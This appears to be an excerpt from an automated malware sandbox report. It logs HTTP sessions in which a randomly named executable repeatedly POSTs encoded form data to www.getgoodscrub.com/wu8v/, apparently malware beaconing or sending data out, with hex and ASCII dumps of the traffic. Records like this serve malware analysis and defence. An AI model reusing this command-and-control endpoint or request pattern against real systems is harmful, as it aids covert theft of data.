                                                                                                                    Data Raw: 35 66 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 [TRUNCATED]
                                                                                                                    Data Ascii: 5f8<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.yekobie.com | Powered by www.lws.fr | ID: 18732bdb438f78b2186286341506f179</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:08.758459091 CEST386INData Raw: 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73
                                                                                                                    Data Ascii: at short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.44976835.213.232.35802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:14.624445915 CEST730OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.getgoodscrub.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.getgoodscrub.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.getgoodscrub.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 4c 2f 44 78 78 41 4b 4e 51 35 6e 4e 55 41 4e 55 4a 36 67 41 43 71 62 78 65 79 4c 62 33 77 6a 63 51 38 6b 4d 35 74 4c 72 45 63 68 2f 4c 49 55 75 35 6b 6c 39 4e 72 44 53 4c 76 33 34 33 36 54 43 65 70 2b 48 5a 2b 77 6c 39 73 52 30 39 79 55 71 72 6c 51 57 30 50 6b 37 33 6b 6c 7a 43 5a 43 38 51 4e 4d 35 4c 53 31 50 78 4a 62 46 76 78 4c 67 4a 48 51 66 42 54 52 45 4e 51 41 36 32 2f 73 6a 32 7a 4c 33 4c 57 63 70 76 57 4a 36 2f 7a 61 57 2f 61 76 44 4c 71 46 51 59 6d 4e 6e 6d 6f 37 77 36 52 42 78 67 37 51 4d 4d 75 32 75 6a 63 4b 64 6c 70 73 63 7a 57 46 67 51 50 67 62 6d 2f 64 68 77 51 3d 3d
                                                                                                                    Data Ascii: MdtlcTm=L/DxxAKNQ5nNUANUJ6gACqbxeyLb3wjcQ8kM5tLrEch/LIUu5kl9NrDSLv3436TCep+HZ+wl9sR09yUqrlQW0Pk73klzCZC8QNM5LS1PxJbFvxLgJHQfBTRENQA62/sj2zL3LWcpvWJ6/zaW/avDLqFQYmNnmo7w6RBxg7QMMu2ujcKdlpsczWFgQPgbm/dhwQ==
                                                                                                                    May 8, 2024 14:07:15.304558039 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:15 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Cache-Enabled: True
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Link: <http://getgoodscrub.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                    X-Httpd-Modphp: 1
                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                    Content-Encoding: br
                                                                                                                    Data Raw: 31 61 61 36 0d 0a 15 62 76 8c 48 4d ea 01 d0 08 1d 3e e7 fd bf af aa ff 6d ff 7c c1 c8 8b 4c 26 00 04 80 53 54 e9 34 f5 48 87 db ec 2e cb 87 07 24 2f 65 c4 14 c1 07 40 ab 0a ef df 96 e5 39 d3 ac 4c 98 39 b4 23 e0 d4 8e 74 6b c0 88 21 c4 e8 a0 aa fe 6f bb 61 c6 af 47 a3 f5 9b 11 3c 3a 12 ec 9e c8 a0 3d a8 0f fd 7b 66 24 2d 12 47 46 8c 12 e0 34 eb dd 48 ce 36 75 94 39 08 52 3f 86 8a ff 2c a2 22 f2 f3 da 99 0c d5 4a d2 f5 f6 37 1d c1 20 c9 18 64 e6 91 d6 96 38 e7 02 d1 0a 09 91 fe 6d ba 7f 84 e7 54 03 22 ed bb c4 30 d0 af 9f f7 71 50 cf b4 28 d4 7b 73 89 a7 d7 2b 23 8a 4b 56 a9 c2 c8 d0 49 28 6a ca 8e 4b 04 0d 97 a6 b7 58 8a 96 2e d3 eb e1 19 59 e8 4b 8c 99 69 55 05 88 6d f7 7a 33 ae 67 fd 80 0e dd 30 17 a2 fb e0 92 65 66 b8 cb a7 ca e5 60 c8 d5 43 d0 60 28 32 70 89 e6 57 e7 2a 04 d9 09 68 71 03 a4 1d 32 a3 d7 1b fd 1f b4 88 ba fc 9a 3f 5e e6 1f a3 9c 47 9f 6f df a3 b3 98 3c 15 ed a4 64 29 a2 08 23 ff 08 84 73 8f fb 5c e0 ec 84 73 f0 57 73 73 07 66 ee 53 24 69 32 60 6e fb d0 60 3c 9a cb 7f 0d 51 f4 0e [TRUNCATED]
                                                                                                                    Data Ascii: 1aa6bvHM>m|L&ST4H.$/e@9L9#tk!oaG<:={f$-GF4H6u9R?,"J7 d8mT"0qP({s+#KVI(jKX.YKiUmz3g0ef`C`(2pW*hq2?^Go<d)#s\sWssfS$i2`n`<Q<zgL>7v[MJej *c$A[4_zH<=~:{(Lw&GAY{(.H~8918+-Ff~![/w[`Qk~rtI@=~0z/{7<)'K'<?CJ?KMROGW"S.cyewvp?/7O<P[('GZ%@2U{1qDb%Inj?|{=*WF|5wl/(djny7\E8VL2s405G&mV
                                                                                                                    May 8, 2024 14:07:15.304573059 CEST1289INData Raw: dc 6e fd d4 e3 76 eb db d7 17 b8 dd 2b cc d6 36 30 db 09 37 66 68 94 af 2a 59 19 ba d0 d2 63 e6 6a be 1f a9 f5 eb 5e cd bf b9 85 58 35 a2 66 34 62 6e df ad 77 60 cb 94 25 2c c2 d3 b4 3c 9f bf ba d0 e1 60 29 e0 16 f7 e5 8b a8 7f f4 dd d0 a2 57 f3
                                                                                                                    Data Ascii: nv+607fh*Ycj^X5f4bnw`%,<`)W=zM38&6_BGE\_| fUk`/6!Kdl8`iBaGp'kSKo8e`/p'p,%7clUu
                                                                                                                    May 8, 2024 14:07:15.304585934 CEST1289INData Raw: 7e de 12 75 8e 41 16 a4 3a bd c7 f9 2e d1 b5 92 ee b9 54 7d 1f ae b3 59 c7 64 4e 45 37 34 23 6a 9e fa a4 e1 59 81 8d 89 b2 9c 41 95 82 ce 9f 2e a6 c1 36 2f ba ae 5b 52 34 a2 25 a3 22 19 65 51 b3 e6 2f a0 47 3b 29 6f 5d b1 da c0 bb ec f7 1e 57 00
                                                                                                                    Data Ascii: ~uA:.T}YdNE74#jYA.6/[R4%"eQ/G;)o]Wd*0Q}4!Z<K(?L`3ad=QQf^6D~R)Mg%ZnPu7Q?xt?,n{G]_B*cC/CI~
                                                                                                                    May 8, 2024 14:07:15.304598093 CEST1289INData Raw: 88 68 62 61 8c 67 09 9b 24 52 8c 6b 09 79 18 cf a3 c6 96 8a f4 64 31 53 35 e7 09 b4 6d 0c e9 b1 36 90 b4 bb c9 96 86 b4 79 4a 72 d6 f1 10 da 16 32 10 e5 80 9a 95 ae c7 a6 84 f4 58 31 52 a6 ab a6 d1 20 3d 5e 1a 72 26 7e b2 d9 20 3d 4e 92 90 89 07
                                                                                                                    Data Ascii: hbag$Rkyd1S5m6yJr2X1R =^r&~ =N^Y2O(30&J\_i;qo{M6R`|'a +y%y3+#/D=vsl.{D(\KEcMuLH8d2 'n` |dSC]}(
                                                                                                                    May 8, 2024 14:07:15.304611921 CEST1289INData Raw: ee c2 e8 c9 ec d1 d1 6c d1 da 78 54 51 ec 3d 74 5a b0 15 7f 48 2d 40 a4 2b 43 8b 10 27 66 7b 02 b4 b7 66 58 ab e6 98 9d c3 09 56 df 50 1c b9 37 d6 1e 09 42 30 04 2c 43 24 b4 cf 46 0d 68 6d fe b2 60 f7 94 2c 42 5c ac 41 d5 ef 03 b5 d9 01 82 1f 05
                                                                                                                    Data Ascii: lxTQ=tZH-@+C'f{fXVP7B0,C$Fhm`,B\A'h^JI}L,X(<$Iu5p$4D+-dc_n#Xc[DI4=<=Y=<DF=kQ$345d6)Jcw,)tEzwim{C!tD&#m
                                                                                                                    May 8, 2024 14:07:15.304625988 CEST942INData Raw: 0a 43 f9 b7 b9 de c9 7e d5 10 c9 52 b1 38 89 37 af e6 bc 58 b2 66 99 eb c2 6a a6 25 48 c2 38 cb 44 46 33 af 16 d9 69 ab 1c 6b 26 3f 95 02 47 eb 5e 1d bb 12 b2 7b 8a 80 0b 8b d9 b3 e7 3a 23 d9 c6 e2 56 4f 39 a2 b0 7f 58 30 11 bd 90 cb 06 6a 9d 5b
                                                                                                                    Data Ascii: C~R87Xfj%H8DF3ik&?G^{:#VO9X0j[iN3OUq33|?xA@]s//F&lIF8!50BL0Z.Edp czuS`#";m'<@||`c


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    26192.168.2.44976935.213.232.35802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:17.577522039 CEST750OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.getgoodscrub.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.getgoodscrub.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.getgoodscrub.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 4c 2f 44 78 78 41 4b 4e 51 35 6e 4e 57 68 64 55 46 39 30 41 4b 71 62 79 52 53 4c 62 35 51 6a 51 51 38 6f 4d 35 76 6d 32 45 75 31 2f 4c 70 49 75 32 46 6c 39 4d 72 44 53 4d 66 33 39 7a 36 53 4f 65 70 79 50 5a 2f 67 6c 39 73 74 30 39 7a 6b 71 6f 55 51 5a 6c 50 6b 35 75 30 6c 31 66 4a 43 38 51 4e 4d 35 4c 57 64 70 78 4a 54 46 73 41 37 67 4c 6d 51 63 43 54 52 46 62 41 41 36 79 2f 74 71 32 7a 4b 55 4c 58 42 45 76 56 78 36 2f 32 6d 57 38 49 48 45 42 71 45 56 57 47 4d 49 72 74 53 39 32 43 67 67 39 62 41 64 4a 66 69 63 76 36 62 48 30 59 4e 4c 68 57 68 54 4e 49 70 76 72 38 67 6f 72 56 56 63 35 42 78 35 53 66 7a 44 53 4e 57 45 4d 2f 42 76 41 71 63 3d
                                                                                                                    Data Ascii: MdtlcTm=L/DxxAKNQ5nNWhdUF90AKqbyRSLb5QjQQ8oM5vm2Eu1/LpIu2Fl9MrDSMf39z6SOepyPZ/gl9st09zkqoUQZlPk5u0l1fJC8QNM5LWdpxJTFsA7gLmQcCTRFbAA6y/tq2zKULXBEvVx6/2mW8IHEBqEVWGMIrtS92Cgg9bAdJficv6bH0YNLhWhTNIpvr8gorVVc5Bx5SfzDSNWEM/BvAqc=
                                                                                                                    May 8, 2024 14:07:18.238111973 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:18 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Cache-Enabled: True
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Link: <http://getgoodscrub.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                    X-Httpd-Modphp: 1
                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                    Content-Encoding: br
                                                                                                                    Data Raw: 31 61 61 36 0d 0a 15 62 76 8c 48 4d ea 01 d0 08 1d 3e e7 fd bf af aa ff 6d ff 7c c1 c8 8b 4c 26 00 04 80 53 54 e9 34 f5 48 87 db ec 2e cb 87 07 24 2f 65 c4 14 c1 07 40 ab 0a ef df 96 e5 39 d3 ac 4c 98 39 b4 23 e0 d4 8e 74 6b c0 88 21 c4 e8 a0 aa fe 6f bb 61 c6 af 47 a3 f5 9b 11 3c 3a 12 ec 9e c8 a0 3d a8 0f fd 7b 66 24 2d 12 47 46 8c 12 e0 34 eb dd 48 ce 36 75 94 39 08 52 3f 86 8a ff 2c a2 22 f2 f3 da 99 0c d5 4a d2 f5 f6 37 1d c1 20 c9 18 64 e6 91 d6 96 38 e7 02 d1 0a 09 91 fe 6d ba 7f 84 e7 54 03 22 ed bb c4 30 d0 af 9f f7 71 50 cf b4 28 d4 7b 73 89 a7 d7 2b 23 8a 4b 56 a9 c2 c8 d0 49 28 6a ca 8e 4b 04 0d 97 a6 b7 58 8a 96 2e d3 eb e1 19 59 e8 4b 8c 99 69 55 05 88 6d f7 7a 33 ae 67 fd 80 0e dd 30 17 a2 fb e0 92 65 66 b8 cb a7 ca e5 60 c8 d5 43 d0 60 28 32 70 89 e6 57 e7 2a 04 d9 09 68 71 03 a4 1d 32 a3 d7 1b fd 1f b4 88 ba fc 9a 3f 5e e6 1f a3 9c 47 9f 6f df a3 b3 98 3c 15 ed a4 64 29 a2 08 23 ff 08 84 73 8f fb 5c e0 ec 84 73 f0 57 73 73 07 66 ee 53 24 69 32 60 6e fb d0 60 3c 9a cb 7f 0d 51 f4 0e [TRUNCATED]
                                                                                                                    Data Ascii: 1aa6bvHM>m|L&ST4H.$/e@9L9#tk!oaG<:={f$-GF4H6u9R?,"J7 d8mT"0qP({s+#KVI(jKX.YKiUmz3g0ef`C`(2pW*hq2?^Go<d)#s\sWssfS$i2`n`<Q<zgL>7v[MJej *c$A[4_zH<=~:{(Lw&GAY{(.H~8918+-Ff~![/w[`Qk~rtI@=~0z/{7<)'K'<?CJ?KMROGW"S.cyewvp?/7O<P[('GZ%@2U{1qDb%Inj?|{=*WF|5wl/(djny7\E8VL2s405G&mV
                                                                                                                    May 8, 2024 14:07:18.238125086 CEST1289INData Raw: dc 6e fd d4 e3 76 eb db d7 17 b8 dd 2b cc d6 36 30 db 09 37 66 68 94 af 2a 59 19 ba d0 d2 63 e6 6a be 1f a9 f5 eb 5e cd bf b9 85 58 35 a2 66 34 62 6e df ad 77 60 cb 94 25 2c c2 d3 b4 3c 9f bf ba d0 e1 60 29 e0 16 f7 e5 8b a8 7f f4 dd d0 a2 57 f3
                                                                                                                    Data Ascii: nv+607fh*Ycj^X5f4bnw`%,<`)W=zM38&6_BGE\_| fUk`/6!Kdl8`iBaGp'kSKo8e`/p'p,%7clUu
                                                                                                                    May 8, 2024 14:07:18.238138914 CEST1289INData Raw: 7e de 12 75 8e 41 16 a4 3a bd c7 f9 2e d1 b5 92 ee b9 54 7d 1f ae b3 59 c7 64 4e 45 37 34 23 6a 9e fa a4 e1 59 81 8d 89 b2 9c 41 95 82 ce 9f 2e a6 c1 36 2f ba ae 5b 52 34 a2 25 a3 22 19 65 51 b3 e6 2f a0 47 3b 29 6f 5d b1 da c0 bb ec f7 1e 57 00
                                                                                                                    Data Ascii: ~uA:.T}YdNE74#jYA.6/[R4%"eQ/G;)o]Wd*0Q}4!Z<K(?L`3ad=QQf^6D~R)Mg%ZnPu7Q?xt?,n{G]_B*cC/CI~
                                                                                                                    May 8, 2024 14:07:18.238151073 CEST1289INData Raw: 88 68 62 61 8c 67 09 9b 24 52 8c 6b 09 79 18 cf a3 c6 96 8a f4 64 31 53 35 e7 09 b4 6d 0c e9 b1 36 90 b4 bb c9 96 86 b4 79 4a 72 d6 f1 10 da 16 32 10 e5 80 9a 95 ae c7 a6 84 f4 58 31 52 a6 ab a6 d1 20 3d 5e 1a 72 26 7e b2 d9 20 3d 4e 92 90 89 07
                                                                                                                    Data Ascii: hbag$Rkyd1S5m6yJr2X1R =^r&~ =N^Y2O(30&J\_i;qo{M6R`|'a +y%y3+#/D=vsl.{D(\KEcMuLH8d2 'n` |dSC]}(
                                                                                                                    May 8, 2024 14:07:18.238164902 CEST1289INData Raw: ee c2 e8 c9 ec d1 d1 6c d1 da 78 54 51 ec 3d 74 5a b0 15 7f 48 2d 40 a4 2b 43 8b 10 27 66 7b 02 b4 b7 66 58 ab e6 98 9d c3 09 56 df 50 1c b9 37 d6 1e 09 42 30 04 2c 43 24 b4 cf 46 0d 68 6d fe b2 60 f7 94 2c 42 5c ac 41 d5 ef 03 b5 d9 01 82 1f 05
                                                                                                                    Data Ascii: lxTQ=tZH-@+C'f{fXVP7B0,C$Fhm`,B\A'h^JI}L,X(<$Iu5p$4D+-dc_n#Xc[DI4=<=Y=<DF=kQ$345d6)Jcw,)tEzwim{C!tD&#m
                                                                                                                    May 8, 2024 14:07:18.238177061 CEST942INData Raw: 0a 43 f9 b7 b9 de c9 7e d5 10 c9 52 b1 38 89 37 af e6 bc 58 b2 66 99 eb c2 6a a6 25 48 c2 38 cb 44 46 33 af 16 d9 69 ab 1c 6b 26 3f 95 02 47 eb 5e 1d bb 12 b2 7b 8a 80 0b 8b d9 b3 e7 3a 23 d9 c6 e2 56 4f 39 a2 b0 7f 58 30 11 bd 90 cb 06 6a 9d 5b
                                                                                                                    Data Ascii: C~R87Xfj%H8DF3ik&?G^{:#VO9X0j[iN3OUq33|?xA@]s//F&lIF8!50BL0Z.Edp czuS`#";m'<@||`c


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    27192.168.2.44977035.213.232.35802132C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    May 8, 2024 14:07:20.526452065 CEST10832OUTPOST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.getgoodscrub.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.getgoodscrub.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.getgoodscrub.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Raw: 4d 64 74 6c 63 54 6d 3d 4c 2f 44 78 78 41 4b 4e 51 35 6e 4e 57 68 64 55 46 39 30 41 4b 71 62 79 52 53 4c 62 35 51 6a 51 51 38 6f 4d 35 76 6d 32 45 75 74 2f 4b 62 41 75 35 43 52 39 4c 72 44 53 50 66 33 38 7a 36 54 55 65 71 43 78 5a 2f 73 66 39 70 68 30 38 52 41 71 70 67 45 5a 38 66 6b 35 6d 55 6c 30 43 5a 43 70 51 4d 39 77 4c 53 35 70 78 4a 54 46 73 43 6a 67 59 58 51 63 4f 7a 52 45 4e 51 41 6d 32 2f 73 50 32 79 69 71 4c 58 46 79 76 6c 52 36 2f 58 57 57 35 39 7a 45 63 36 45 62 56 47 4d 51 72 74 58 39 32 43 4d 73 39 59 63 33 4a 66 57 63 6c 39 32 7a 67 63 56 50 77 47 70 35 56 4b 46 46 71 39 77 47 69 56 52 47 2b 68 4a 78 4a 37 33 4c 58 36 48 51 58 76 70 58 43 36 6c 30 43 65 48 44 78 51 31 59 42 46 57 6f 30 45 43 4b 79 64 37 46 69 66 66 2b 33 47 68 43 45 33 78 64 4e 76 77 2f 67 64 75 51 78 52 58 4b 51 6a 61 57 53 41 2f 4a 47 54 66 6a 46 30 35 43 50 6a 41 6f 62 34 58 57 73 61 64 59 48 73 53 46 6e 4e 71 41 4f 30 4b 59 57 77 50 59 51 38 70 37 6b 75 36 57 58 55 6d 6d 59 7a 66 59 34 61 46 36 71 79 54 30 70 68 [TRUNCATED]
                                                                                                                    Data Ascii: MdtlcTm=L/DxxAKNQ5nNWhdUF90AKqbyRSLb5QjQQ8oM5vm2Eut/KbAu5CR9LrDSPf38z6TUeqCxZ/sf9ph08RAqpgEZ8fk5mUl0CZCpQM9wLS5pxJTFsCjgYXQcOzRENQAm2/sP2yiqLXFyvlR6/XWW59zEc6EbVGMQrtX92CMs9Yc3JfWcl92zgcVPwGp5VKFFq9wGiVRG+hJxJ73LX6HQXvpXC6l0CeHDxQ1YBFWo0ECKyd7Fiff+3GhCE3xdNvw/gduQxRXKQjaWSA/JGTfjF05CPjAob4XWsadYHsSFnNqAO0KYWwPYQ8p7ku6WXUmmYzfY4aF6qyT0phwdw7uBI5pg0bLxRzJXaFOfSJAz79r6Fxb+p2uUna6lXHqnx8rKwmCRUH8oBNzu0V6TLZF1T9mH8riwLKS0stsnhpW780QskHq9avqbJQpcYtj/d/u15OK1vYcGSWRYqbDHQxOg37/Pa7wkTIkRnlWegvO6AWe6g5O8BWP8zbaWyvyvAzRpjJpJhaWg8/X0fNxtFCx6eMfaNSdt1SnbOApLx/GBFPQZsJux9yQGYSF/kZXoK/HPhZ0AS+ePr6ggbgBAC+pDZqlfsTqRHRr/1Rub7rnbkkSODqGwXfplJh3epdwecx3gZ8nm6sVQQKK5EBmzMs/jkL0bS0M6AyFFWj4BJs/6W1E4fDuE0fgzZdohFIT9rSlYAIOyrgK2tS5tRWq3ROUeZzeWcJ0QnB9buRQGIxXwAwGuqzUSjZVtXcae4t2eh2TjYDpPFpmrtqAQ6Xi5E+xfoZM1ImPV/RyKTZSeoEYpHd8D1pwn4qbehf2dH86BGSOrrmv2AeN9R9RSE9xa+scAOA1zmqmpGSZyAx37GrFChl4c+h5GKQavZbD1tYgoFs32zXarZnww0eCgWwQJ9rBbs812Yz+V4j/ovxb6HSXj9VMcrJBmZAwD825/n2RxYPkgxXkD5peW+wrbNmgTWCyAoK4/riAun4YA3C+qqOulZykUE3P4 [TRUNCATED]
                                                                                                                    May 8, 2024 14:07:21.128302097 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:07:20 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    X-Cache-Enabled: True
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    Link: <http://getgoodscrub.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                    X-Httpd-Modphp: 1
                                                                                                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                    X-Proxy-Cache-Info: DT:1
                                                                                                                    Content-Encoding: br
                                                                                                                    Data Raw: 31 61 61 36 0d 0a 15 62 76 8c 48 4d ea 01 d0 08 1d 3e e7 fd bf af aa ff 6d ff 7c c1 c8 8b 4c 26 00 04 80 53 54 e9 34 f5 48 87 db ec 2e cb 87 07 24 2f 65 c4 14 c1 07 40 ab 0a ef df 96 e5 39 d3 ac 4c 98 39 b4 23 e0 d4 8e 74 6b c0 88 21 c4 e8 a0 aa fe 6f bb 61 c6 af 47 a3 f5 9b 11 3c 3a 12 ec 9e c8 a0 3d a8 0f fd 7b 66 24 2d 12 47 46 8c 12 e0 34 eb dd 48 ce 36 75 94 39 08 52 3f 86 8a ff 2c a2 22 f2 f3 da 99 0c d5 4a d2 f5 f6 37 1d c1 20 c9 18 64 e6 91 d6 96 38 e7 02 d1 0a 09 91 fe 6d ba 7f 84 e7 54 03 22 ed bb c4 30 d0 af 9f f7 71 50 cf b4 28 d4 7b 73 89 a7 d7 2b 23 8a 4b 56 a9 c2 c8 d0 49 28 6a ca 8e 4b 04 0d 97 a6 b7 58 8a 96 2e d3 eb e1 19 59 e8 4b 8c 99 69 55 05 88 6d f7 7a 33 ae 67 fd 80 0e dd 30 17 a2 fb e0 92 65 66 b8 cb a7 ca e5 60 c8 d5 43 d0 60 28 32 70 89 e6 57 e7 2a 04 d9 09 68 71 03 a4 1d 32 a3 d7 1b fd 1f b4 88 ba fc 9a 3f 5e e6 1f a3 9c 47 9f 6f df a3 b3 98 3c 15 ed a4 64 29 a2 08 23 ff 08 84 73 8f fb 5c e0 ec 84 73 f0 57 73 73 07 66 ee 53 24 69 32 60 6e fb d0 60 3c 9a cb 7f 0d 51 f4 0e [TRUNCATED]
                                                                                                                    Data Ascii: 1aa6bvHM>m|L&ST4H.$/e@9L9#tk!oaG<:={f$-GF4H6u9R?,"J7 d8mT"0qP({s+#KVI(jKX.YKiUmz3g0ef`C`(2pW*hq2?^Go<d)#s\sWssfS$i2`n`<Q<zgL>7v[MJej *c$A[4_zH<=~:{(Lw&GAY{(.H~8918+-Ff~![/w[`Qk~rtI@=~0z/{7<)'K'<?CJ?KMROGW"S.cyewvp?/7O<P[('GZ%@2U{1qDb%Inj?|{=*WF|5wl/(djny7\E8VL2s405G&mV
